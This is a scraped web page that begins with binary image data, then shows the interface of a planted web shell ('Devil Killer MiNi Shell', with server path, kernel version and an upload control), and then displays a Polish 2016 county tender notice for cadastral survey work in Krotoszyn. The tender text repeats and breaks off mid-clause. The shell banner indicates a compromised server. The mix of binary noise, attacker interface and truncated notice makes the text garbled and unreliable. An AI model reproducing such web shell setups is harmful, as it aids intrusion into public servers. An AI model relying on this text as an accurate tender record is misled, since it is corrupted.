JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160623/100331-N-2016.html

<p class="kh_header"><b>Krotoszyn: Wykonanie prac geodezyjno-kartograficznych związanych z modernizacją ewidencji gruntów i budynków dla części  miasta Krotoszyna z podziałem na dwa zadania:
Zadanie 1  miasto Krotoszyn, arkusze ewidencyjne 30,31,39,40,41
Zadanie 2  miasto Krotoszyn, arkusze ewidencyjne 72,73</b><br>
<b>Numer ogłoszenia: 100331 - 2016; data zamieszczenia: 23.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac geodezyjno-kartograficznych związanych z modernizacją ewidencji gruntów i budynków dla części  miasta Krotoszyna z podziałem na dwa zadania:
Zadanie 1  miasto Krotoszyn, arkusze ewidencyjne 30,31,39,40,41
Zadanie 2  miasto Krotoszyn, arkusze ewidencyjne 72,73.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie prac geodezyjno-kartograficznych związanych z modernizacją ewidencji gruntów i budynków dla części  miasta Krotoszyna z podziałem na dwa zadania:
Zadanie 1  miasto Krotoszyn, arkusze ewidencyjne 30,31,39,40,41
Zadanie 2  miasto Krotoszyn, arkusze ewidencyjne 72,73
         W zakresie zgodnym  z:
projektem modernizacji  ewidencji gruntów i budynków - załącznik Nr 1 a do niniejszej SIWZ
 warunkami  technicznymi  stanowiącymi Załącznik   Nr 1b         do niniejszej    SIWZ.

	2.3. Oprogramowanie,  na  którym    wykonane  zostanie  zamówienie  winno  być                kompatybilne z istniejącym oprogramowaniem GEO-INFO 7.


3. PODWYKONAWSTWO 
     3.1.   Zamawiający  dopuszcza możliwości zlecania części prac podwykonawcy. 
		3.2. Zgodnie z art. 36 a ust. 2 pkt. 1 ustawy prawo zamówień publicznych, Zamawiający               zastrzega obowiązek osobistego wykonania przez Wykonawcę  kluczowych części               zamówienia.
              Przez kluczowe części zamówienia, Zamawiający  rozumie wykonanie następujących                prac  przez Wykonawcę:
a)	pomiary terenowe
b)	ustalenie przebiegu granic działek ewidencyjnych
c)	prace obliczeniowe
d)	definiowanie obiektów w bazie danych
e)	analiza materiałów geodezyjnych i kartograficznych
f)	udział w wyłożeniu projektu operatu opisowo-kartograficznego
g)	kompletowanie operatu technicznego
h)	uzupełnienie baz danych ewidencji gruntów i budynków
3.3. W złożonej ofercie, w formularzu ofertowym, Wykonawca zobowiązany jest  wskazać części zamówienia, których wykonanie  zamierza powierzyć podwykonawcy.
3.4. Zamawiający dopuszcza udział podwykonawców pod warunkiem, że posiadać będą odpowiednie kwalifikacje i uprawnienia do realizacji powierzonego im zakresu robót.
3.5. Wykonawca  będzie  ponosił  pełną  odpowiedzialność  wobec  Zamawiającego 
i osób trzecich za prace wykonane przez podwykonawców. Wykonawca jest odpowiedzialny za działania, uchybienia, zaniedbania i zaniechania podwykonawców w takim samym stopniu, jakby to były działania, uchybienia lub zaniedbania jego własnych pracowników.  
3.6.  Zmiana  podwykonawcy  w  trakcie  realizacji  przedmiotu  zamówienia  może  nastąpić wyłącznie za zgodą Zamawiającego. 
3.7.  Zamawiający zastrzega sobie prawo akceptacji podwykonawców. 
3.8. Wykonawca w przypadku zawierania umów z podwykonawcą zobowiązany jest do przedstawienia Zamawiającemu projektu umowy z podwykonawcą.
3.9. Umowa z podwykonawcą musi zawierać:
a)	określenie zakresu prac powierzonych podwykonawcy
b)	kwotę wynagrodzenia za wykonane prace
c)	termin wykonania zakresu prac powierzonych podwykonawcy
d)	warunki płatności
e)	Postanowienia dotyczące kar umownych jak w projekcie  umowy stanowiącej załącznik nr 8 do niniejszej SIWZ
f)	Termin zapłaty nie dłużej niż 30 dni od dnia doręczenia faktury/rachunku Wykonawcy
3.10. Do zawarcia przez Wykonawcę  umowy z Podwykonawcą wymagana jest zgoda            Zamawiającego. Jeżeli w ciągu 5 dni roboczych od dnia przedstawienia mu przez            wykonawcę umowy z podwykonawcą  lub jej projektu nie zgłosi na piśmie sprzeciwu lub             zastrzeżeń, uważa się że Zamawiający wyraził zgodę na zawarcie umowy.
3.11. Zamawiający nie wyrazi zgody na zawarcie umowy z podwykonawcą, której treść będzie      sprzeczna z treścią umowy zawartej z Wykonawcą.
3.12. Warunkiem wypłaty wynagrodzenia Wykonawcy określonego w umowie jest wskazanie       Zamawiającemu faktu uiszczenia przez Wykonawcę na rzecz podwykonawcy należnego       mu wynagrodzenia za wykonane roboty. Wykonawca przedkłada dowód dokonania       płatności.
3.13. Do czasu przedstawienia przez Wykonawcę dowodu uiszczenia płatności, nie biegną       terminy określone w postanowieniach umowy dotyczące płatności, a Wykonawcy nie       przysługują za ten okres odsetki ustawowe.
3.14.  W przypadku nie uregulowania przez Wykonawcę należności  wobec Podwykonawców,       Zamawiający może obniżyć kwotę płatności wynagrodzenia na rzecz Wykonawcy o       kwotę należna Podwykonawcy, zatrzymując ją jako zabezpieczenie na wypadek roszczeń       podwykonawcy, które mogą być skierowane wobec Zamawiającego. 
3.15. Zamawiający nie wyraża zgody na zawieranie umów Podwykonawców z dalszym       Podwykonawcą..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku  dotyczącego dysponowania   osobami zdolnymi do wykonania zamówienia zostanie dokonana na podstawie  wykazu osób przewidzianych do realizacji zamówienia. Warunek zostanie spełniony, jeśli Wykonawca przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności z  informacją  o podstawie do dysponowania tymi osobami. 
Wykaz powinien potwierdzać dysponowanie,  co najmniej jedną osobą posiadającą  uprawnienia geodezyjne w zakresie 1 i 2   wydane na mocy Rozporządzenia Ministra Administracji i Cyfryzacji z dnia 31 stycznia 2014 r. w sprawie uprawnień zawodowych w dziedzinie geodezji i kartografii (Dz. U. z 2014 poz. 176) w związku z art. 45 h ustawy z dnia 17 maja 1989 r. - Prawo geodezyjne i kartograficzne (t.j.Dz. U. z 2010 r. Nr 193, poz. 1287, z późn. zm.) oraz dołączą oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, w dziedzinie geodezji i kartografii o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Wydłużenie gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w przypadku zmiany podwykonawców i dalszych podwykonawców, na zasoby których Wykonawca powoływał się przy wykazywaniu  spełniania warunków udziału w postępowaniu.  Zamawiający dopuszcza możliwość zmiany podwykonawców i dalszych  podwykonawców, pod warunkiem wykazania zamawiającemu, iż proponowany inny podwykonawca lub wykonawca  samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
2.	 Zamawiający przewiduje  możliwość dokonania zmian postanowień zawartej umowy; w szczególności zmiany wysokości wynagrodzenia Wykonawcy w przypadku urzędowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://powiat krotoszyn.bip.net.pl
lub
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2016 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie  będzie współfinansowane ze środków Unii Europejskiej w ramach Wielkopolskiego Regionalnego  Programu Operacyjnego 2014+, Cyfrowy Powiat Krotoszyński..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie prac geodezyjno-kartograficznych związanych z modernizacją ewidencji gruntów i budynków dla części  miasta Krotoszyna z podziałem na dwa zadania:
Zadanie 1  miasto Krotoszyn, arkusze ewidencyjne 30,31,39,40,41.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie prac geodezyjno-kartograficznych związanych z modernizacją ewidencji gruntów i budynków dla części  miasta Krotoszyna z podziałem na dwa zadania:
Zadanie 1  miasto Krotoszyn, arkusze ewidencyjne 30,31,39,40,41
         W zakresie zgodnym  z:
projektem modernizacji  ewidencji gruntów i budynków - załącznik Nr 1 a do niniejszej SIWZ
 warunkami  technicznymi  stanowiącymi Załącznik   Nr 1b         do niniejszej    SIWZ.

	2.3. Oprogramowanie,  na  którym    wykonane  zostanie  zamówienie  winno  być                kompatybilne z istniejącym oprogramowaniem GEO-INFO 7.


3. PODWYKONAWSTWO 
     3.1.   Zamawiający  dopuszcza możliwości zlecania części prac podwykonawcy. 
		3.2. Zgodnie z art. 36 a ust. 2 pkt. 1 ustawy prawo zamówień publicznych, Zamawiający               zastrzega obowiązek osobistego wykonania przez Wykonawcę  kluczowych części               zamówienia.
              Przez kluczowe części zamówienia, Zamawiający  rozumie wykonanie następujących                prac  przez Wykonawcę:
a)	pomiary terenowe
b)	ustalenie przebiegu granic działek ewidencyjnych
c)	prace obliczeniowe
d)	definiowanie obiektów w bazie danych
e)	analiza materiałów geodezyjnych i kartograficznych
f)	udział w wyłożeniu projektu operatu opisowo-kartograficznego
g)	kompletowanie operatu technicznego
h)	uzupełnienie baz danych ewidencji gruntów i budynków
3.3. W złożonej ofercie, w formularzu ofertowym, Wykonawca zobowiązany jest  wskazać części zamówienia, których wykonanie  zamierza powierzyć podwykonawcy.
3.4. Zamawiający dopuszcza udział podwykonawców pod warunkiem, że posiadać będą odpowiednie kwalifikacje i uprawnienia do realizacji powierzonego im zakresu robót.
3.5. Wykonawca  będzie  ponosił  pełną  odpowiedzialność  wobec  Zamawiającego 
i osób trzecich za prace wykonane przez podwykonawców. Wykonawca jest odpowiedzialny za działania, uchybienia, zaniedbania i zaniechania podwykonawców w takim samym stopniu, jakby to były działania, uchybienia lub zaniedbania jego własnych pracowników.  
3.6.  Zmiana  podwykonawcy  w  trakcie  realizacji  przedmiotu  zamówienia  może  nastąpić wyłącznie za zgodą Zamawiającego. 
3.7.  Zamawiający zastrzega sobie prawo akceptacji podwykonawców. 
3.8. Wykonawca w przypadku zawierania umów z podwykonawcą zobowiązany jest do przedstawienia Zamawiającemu projektu umowy z podwykonawcą.
3.9. Umowa z podwykonawcą musi zawierać:
a)	określenie zakresu prac powierzonych podwykonawcy
b)	kwotę wynagrodzenia za wykonane prace
c)	termin wykonania zakresu prac powierzonych podwykonawcy
d)	warunki płatności
e)	Postanowienia dotyczące kar umownych jak w projekcie  umowy stanowiącej załącznik nr 8 do niniejszej SIWZ
f)	Termin zapłaty nie dłużej niż 30 dni od dnia doręczenia faktury/rachunku Wykonawcy
3.10. Do zawarcia przez Wykonawcę  umowy z Podwykonawcą wymagana jest zgoda            Zamawiającego. Jeżeli w ciągu 5 dni roboczych od dnia przedstawienia mu przez            wykonawcę umowy z podwykonawcą  lub jej projektu nie zgłosi na piśmie sprzeciwu lub             zastrzeżeń, uważa się że Zamawiający wyraził zgodę na zawarcie umowy.
3.11. Zamawiający nie wyrazi zgody na zawarcie umowy z podwykonawcą, której treść będzie      sprzeczna z treścią umowy zawartej z Wykonawcą.
3.12. Warunkiem wypłaty wynagrodzenia Wykonawcy określonego w umowie jest wskazanie       Zamawiającemu faktu uiszczenia przez Wykonawcę na rzecz podwykonawcy należnego       mu wynagrodzenia za wykonane roboty. Wykonawca przedkłada dowód dokonania       płatności.
3.13. Do czasu przedstawienia przez Wykonawcę dowodu uiszczenia płatności, nie biegną       terminy określone w postanowieniach umowy dotyczące płatności, a Wykonawcy nie       przysługują za ten okres odsetki ustawowe.
3.14.  W przypadku nie uregulowania przez Wykonawcę należności  wobec Podwykonawców,       Zamawiający może obniżyć kwotę płatności wynagrodzenia na rzecz Wykonawcy o       kwotę należna Podwykonawcy, zatrzymując ją jako zabezpieczenie na wypadek roszczeń       podwykonawcy, które mogą być skierowane wobec Zamawiającego. 
3.15. Zamawiający nie wyraża zgody na zawieranie umów Podwykonawców z dalszym       Podwykonawcą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Wydłużenie gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie prac geodezyjno-kartograficznych związanych z modernizacją ewidencji gruntów i budynków dla części  miasta Krotoszyna z podziałem na dwa zadania:

Zadanie 2  miasto Krotoszyn, arkusze ewidencyjne 72,73.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie prac geodezyjno-kartograficznych związanych z modernizacją ewidencji gruntów i budynków dla części  miasta Krotoszyna z podziałem na dwa zadania:
Zadanie 2  miasto Krotoszyn, arkusze ewidencyjne 72,73
         W zakresie zgodnym  z:
projektem modernizacji  ewidencji gruntów i budynków - załącznik Nr 1 a do niniejszej SIWZ
 warunkami  technicznymi  stanowiącymi Załącznik   Nr 1b         do niniejszej    SIWZ.

	2.3. Oprogramowanie,  na  którym    wykonane  zostanie  zamówienie  winno  być                kompatybilne z istniejącym oprogramowaniem GEO-INFO 7.


3. PODWYKONAWSTWO 
     3.1.   Zamawiający  dopuszcza możliwości zlecania części prac podwykonawcy. 
		3.2. Zgodnie z art. 36 a ust. 2 pkt. 1 ustawy prawo zamówień publicznych, Zamawiający               zastrzega obowiązek osobistego wykonania przez Wykonawcę  kluczowych części               zamówienia.
              Przez kluczowe części zamówienia, Zamawiający  rozumie wykonanie następujących                prac  przez Wykonawcę:
a)	pomiary terenowe
b)	ustalenie przebiegu granic działek ewidencyjnych
c)	prace obliczeniowe
d)	definiowanie obiektów w bazie danych
e)	analiza materiałów geodezyjnych i kartograficznych
f)	udział w wyłożeniu projektu operatu opisowo-kartograficznego
g)	kompletowanie operatu technicznego
h)	uzupełnienie baz danych ewidencji gruntów i budynków
3.3. W złożonej ofercie, w formularzu ofertowym, Wykonawca zobowiązany jest  wskazać części zamówienia, których wykonanie  zamierza powierzyć podwykonawcy.
3.4. Zamawiający dopuszcza udział podwykonawców pod warunkiem, że posiadać będą odpowiednie kwalifikacje i uprawnienia do realizacji powierzonego im zakresu robót.
3.5. Wykonawca  będzie  ponosił  pełną  odpowiedzialność  wobec  Zamawiającego 
